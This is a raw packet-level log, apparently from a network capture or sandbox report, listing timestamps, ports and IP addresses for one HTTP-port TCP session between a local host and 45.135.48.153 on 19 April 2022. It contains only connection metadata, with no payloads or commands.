Apr 19, 2022 16:44:37.995145082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.291044950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291102886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291146040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291193008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291204929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.291251898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.291277885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291389942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291454077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.291485071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291601896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291666031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.291723967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291847944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.291903019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.292013884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.292121887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.292165995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.292181015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.292337894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.292442083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.292459965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.292520046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.292577028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.292690039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.292732000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.292788029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.292843103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.292980909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.293015003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.293040037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.337553978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.649934053 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.946655035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.946721077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.946760893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.946800947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.946810961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.946913958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.946957111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.946988106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.946995020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.947025061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.947036982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.947195053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.947201014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.947287083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.947365999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.947444916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.947572947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.947632074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.947635889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.947900057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.947941065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948003054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.948007107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948060036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.948127031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948198080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948365927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948422909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.948452950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948503971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.948522091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948717117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948856115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948913097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.948930025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948970079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.948985100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.949146032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.949213028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.949270010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.949368000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.949431896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.949490070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.949561119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.949626923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.949681044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.949846983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.949903011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.949939966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.950212002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.950279951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.950376987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.950649023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.950712919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.950762987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.950896978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.950956106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.951019049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951060057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951117039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.951158047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951289892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951435089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951493979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.951529026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951580048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.951646090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951767921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951827049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951884031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:38.951945066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:38.951996088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.242891073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.242947102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.242989063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.243030071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.243071079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.243110895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.243134975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.243246078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.243351936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.243417025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.243488073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.243552923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.243592978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.243721962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.243767023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.243825912 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.243954897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.244015932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.244024992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.244146109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.244275093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.244345903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.244400978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.244466066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.244520903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.244615078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.244707108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.244759083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.244868994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.244931936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.245029926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.245107889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.245165110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.245193958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.245323896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.245364904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.245378971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.245520115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.245590925 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.245646954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.245739937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.245845079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.245903015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.245975018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.246035099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.246047020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.246247053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.246285915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.246308088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.246407032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.246593952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.246645927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.246656895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.246799946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.246857882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.246864080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.246936083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.247005939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.247047901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.247107029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.247203112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.247319937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.247379065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.247561932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.247603893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.247760057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.247802973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.247824907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.247900009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.247931004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.248020887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.251243114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.538877964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.538937092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.538979053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539019108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539057016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539078951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.539132118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.539186001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539282084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.539292097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539361954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539458990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.539491892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539608955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539695978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539776087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.539798975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.539880037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.539927959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.540036917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.540163040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.540244102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.540255070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.540349007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.540381908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.540507078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.540631056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.540653944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.540725946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.540819883 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.540848017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.540971041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.541085958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.541177988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.541207075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.541274071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.541280031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.541409969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.541507006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.541613102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.541635990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.541716099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.541757107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.541827917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.541965961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.542047977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.542143106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.542210102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.542213917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.542335987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.542484999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.542526007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.542546988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.542578936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.542670012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.542759895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.542884111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.542968988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.542977095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.543044090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.543114901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.543184996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.543332100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.543426037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.543440104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.543500900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.543567896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.543736935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.546197891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.546747923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.546788931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.546845913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.834806919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.834856033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.834887981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.834918022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.834971905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.835031033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.835110903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.835143089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.835232019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.835272074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.835351944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.835469007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.835535049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.835582972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.835644960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.835738897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.835772038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.835930109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.835999966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.836049080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.836116076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.836165905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.836286068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.836456060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.836524010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.836568117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.836639881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.836682081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.836802959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.836874008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.836906910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.836942911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.836963892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.837057114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.837135077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.837289095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.837363958 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.837415934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.837482929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.837532997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.837668896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.837812901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.837845087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.837882042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.837905884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.838002920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.838109970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.838246107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.838288069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.838321924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.838346004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.838454962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.838541985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.838661909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.838726997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.838819027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.838895082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.838952065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.838992119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.839104891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.839174986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.839231968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.839318991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.839381933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.839453936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.841595888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.841687918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.841741085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.841804028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:39.842228889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.842343092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:39.842406034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.130534887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.130594969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.130685091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.130687952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.130748034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.130922079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.130969048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.130985022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.131019115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.131114960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.131196976 CEST	80	49758	45.135.48.153	192.168.2.4
